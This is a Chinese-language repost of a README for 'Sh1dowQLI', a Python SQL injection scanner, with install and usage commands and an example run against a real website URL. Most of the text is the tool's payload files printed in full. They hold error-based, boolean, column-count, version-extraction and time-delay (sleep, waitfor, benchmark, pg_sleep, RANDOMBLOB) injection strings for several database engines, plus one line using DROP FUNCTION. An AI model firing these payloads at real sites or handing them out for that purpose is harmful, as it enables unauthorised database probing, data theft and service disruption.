Sh1dowQLI 基于Python的SQL注入漏洞扫描器

Sh1dowQLI简介

基于 Python 的 SQL 注入扫描程序，旨在检测 Web 应用程序中的 SQL 漏洞。该工具支持基于错误的 SQL 注入和盲 SQL 注入技术。

特征

• 基于错误的 SQL 注入扫描
• 基于时间的 SQL 注入扫描
• 用户友好界面

要求

在使用该工具之前，请确保您已准备好以下环境：

1. Python 3.6+ installed.
2. Required Python libraries:
   - `colorama`
   - `requests`

要安装依赖项，请运行：

pip install colorama requests

---

安装

克隆此存储库：

git clone https://github.com/HexShad0w/Sh1dowQLI.git

cd Sh1dowQLI

运行该工具：

python3 sh1dowqli.py

或者

使用命令行参数实现更快的自动扫描：

-u：指定目标 URL
-f：包含多个 URL 的文件
-p：加载自定义有效负载文件
-o：将结果保存到文件

python3 time-based.py -u target url -p payloads/time_based.txt -o output.txt

python3 error-based.py -u target url -p payloads/error_based.txt -o output.txt

使用示例

time-based.py -u https://www.ddosi.org/?s=* -p payloads/time_based.txt -o output.txt

payloads

error_based.txt

 OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1--
 OR 1=0--
 OR x=x--
 OR x=y--
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1--
 HAVING 1=0--
 AND 1=1
 AND 1=0
 AND 1=1--
 AND 1=0--
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1--
 ORDER BY 2--
 ORDER BY 3--
 ORDER BY 4--
 ORDER BY 5--
 ORDER BY 6--
 ORDER BY 7--
 ORDER BY 8--
 ORDER BY 9--
 ORDER BY 10--
 ORDER BY 11--
 ORDER BY 12--
 ORDER BY 13--
 ORDER BY 14--
 ORDER BY 15--
 ORDER BY 16--
 ORDER BY 17--
 ORDER BY 18--
 ORDER BY 19--
 ORDER BY 20--
 ORDER BY 21--
 ORDER BY 22--
 ORDER BY 23--
 ORDER BY 24--
 ORDER BY 25--
 ORDER BY 26--
 ORDER BY 27--
 ORDER BY 28--
 ORDER BY 29--
 ORDER BY 30--
 ORDER BY 31337--
 ORDER BY 1#
 ORDER BY 2#
 ORDER BY 3#
 ORDER BY 4#
 ORDER BY 5#
 ORDER BY 6#
 ORDER BY 7#
 ORDER BY 8#
 ORDER BY 9#
 ORDER BY 10#
 ORDER BY 11#
 ORDER BY 12#
 ORDER BY 13#
 ORDER BY 14#
 ORDER BY 15#
 ORDER BY 16#
 ORDER BY 17#
 ORDER BY 18#
 ORDER BY 19#
 ORDER BY 20#
 ORDER BY 21#
 ORDER BY 22#
 ORDER BY 23#
 ORDER BY 24#
 ORDER BY 25#
 ORDER BY 26#
 ORDER BY 27#
 ORDER BY 28#
 ORDER BY 29#
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1
 ORDER BY 2
 ORDER BY 3
 ORDER BY 4
 ORDER BY 5
 ORDER BY 6
 ORDER BY 7
 ORDER BY 8
 ORDER BY 9
 ORDER BY 10
 ORDER BY 11
 ORDER BY 12
 ORDER BY 13
 ORDER BY 14
 ORDER BY 15
 ORDER BY 16
 ORDER BY 17
 ORDER BY 18
 ORDER BY 19
 ORDER BY 20
 ORDER BY 21
 ORDER BY 22
 ORDER BY 23
 ORDER BY 24
 ORDER BY 25
 ORDER BY 26
 ORDER BY 27
 ORDER BY 28
 ORDER BY 29
 ORDER BY 30
 ORDER BY 31337
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='c'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'

time_based.txt

sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

使用截图

下载地址

https://github.com/HexShad0w/Sh1dowQLI/archive/refs/heads/main.zip

转载请注明出处及链接